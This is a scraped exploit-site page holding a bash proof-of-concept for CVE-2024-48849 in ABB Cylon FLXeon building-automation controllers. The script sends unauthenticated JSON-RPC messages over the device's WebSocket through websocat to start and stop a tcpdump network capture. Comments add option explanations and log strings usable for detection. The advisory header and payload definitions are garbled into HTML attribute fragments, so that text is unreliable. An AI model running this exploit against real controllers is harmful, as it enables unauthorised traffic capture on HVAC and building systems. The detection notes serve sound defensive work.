## https://sploitus.com/exploit?id=ZSL-2025-5913
<html><body><p>#!/bin/bash
<<eoc .="" .-="" .--="" .---="" ._____="" _="" _.="" ___="" ____="" a="" abb="" advisory="" affected="" air="" allowing="" allows="" amplifying="" an="" and="" are="" as="" aspect="" attack="" attacker="" authentication="" automation="" bacnet="" be="" boilers="" building="" by="" c="" can="" capture="" captures="" cat="" cbt="" cbv="" cbx="" central="" chillers="" command="" command.="" conditions="" connectivity="" continuously="" control="" controller="" controllers="" controllers.="" cooling="" cve="" cve-2024-48849="" cylon="" data="" deliver="" denial="" desc:="" designed="" device="" discovered="" diverse="" drives="" e="" echo="" electrical="" eoc="" eof="" equipment="" execute="" exfiltration.="" exhaustion="" exit="" exploit="" exploited="" express="" fbti="" fbvi="" features="" fi="" field="" filters="" firmware:="" flxeon="" for="" frequency="" functions.="" gjoko="" handling="" heat="" https:="" hvac="" id:="" if="" impact.="" implementation="" in="" instances="" integra="" integration="" intelligent="" interface="" ip="" is="" it="" j="" jsonrpc="" kernel="" krstic="" lack="" leading="" lighting="" linux="" loop="" ltd.="" management="" metering.="" modular="" ms="" multi-zone="" multiple="" network="" new="" nodejs="" o="" of="" on="" on:="" open="" p="" page:="" pid="$!" 
plant="" poc="" portfolio="" ports="" potential="" processes="" product="" pump="" r="" range="" relevant="" resource="" rooftop="" scalable="" sending="" serial="" series="" service="" services.="" smart="" smartrouter="" solutions.="" spawn="" spawning="" standards="" start="" start_service="`echo" stop_service="`echo" such="" summary:="" systems="" systems.="" t="" target="wss://$IP:443/ws" tcpdump="" tested="" that="" the="" then="" this="" to="" towers="" traffic="" unauthenticated="" unauthorized="" units="" unprecedented="" url:="" users="" uses="" variable="" vendor:="" version:="" volume="" vulnerability="" vulnerable="" web="" websocket="" which="" you="" your="" zsl-2025-5913=""> $START_SERVICE\n"
# Tail of the proof-of-concept: two JSON-RPC messages are sent to the device's
# WebSocket endpoint, one to start the capture service and one to stop it.
# START_SERVICE, STOP_SERVICE and TARGET are assigned earlier in the script;
# that part is not legible in this copy, so their exact contents are not
# documented here.
# NOTE(review): no credential, cookie or token is passed on either websocat
# command line below, which matches the advisory's "unauthenticated" wording.
# Defenders should treat any reachable /ws endpoint on these controllers as
# exposed and restrict network access to it until patched firmware is installed.
sleep 1
# First message: the start request. websocat options used:
#   --insecure      accept invalid TLS certificates/hostnames (no peer verification)
#   --one-message   send and/or receive a single message, then finish
#   --buffer-size   maximum message size in bytes (251 here)
#   --no-close      do not send a WebSocket Close frame on EOF
#   -v              verbose client output
echo "$START_SERVICE"|
websocat --insecure --one-message --buffer-size 251 --no-close "$TARGET" -v
# Pause between the start and stop requests.
sleep 2
echo -e "\n[+] Sending JSONRPC => $STOP_SERVICE\n"
sleep 1
# Second message: the stop request. -k -1 -B -n are the short forms of the
# same four options used for the start request above.
echo "$STOP_SERVICE"|
websocat -k -1 -B 251 -n "$TARGET" -v
echo -e "\n[*] Done"
# Here-document with a quoted delimiter and no command reading it: the shell
# expands nothing inside it and discards the text, so it serves as a block
# comment. It holds the author's sample journal output (journalctl -r lists
# newest entries first, so the excerpt reads bottom-up).
# Detection note: the node "ws connect" entry followed by kernel
# "entered promiscuous mode" / "left promiscuous mode" entries on an interface
# is the log trace shown for a capture being started and stopped over the
# WebSocket; these strings are usable as search terms when reviewing device logs.
<< "LOG"
$ cd /usr/local/aam/var; journalctl -r --no-hostname --no-pager >log.txt; split -n 4 log.txt
$ cat /usr/local/aam/var/xaa
$ cat /usr/local/aam/var/xab
$ cat /usr/local/aam/var/xac
$ cat /usr/local/aam/var/xad
...
#Apr 21 23:12:51 kernel: device lo left promiscuous mode
#Apr 21 23:12:34 kernel: device lo entered promiscuous mode
#Apr 21 23:12:34 node[196]: ws connect
...
LOG
</eoc></p></body></html>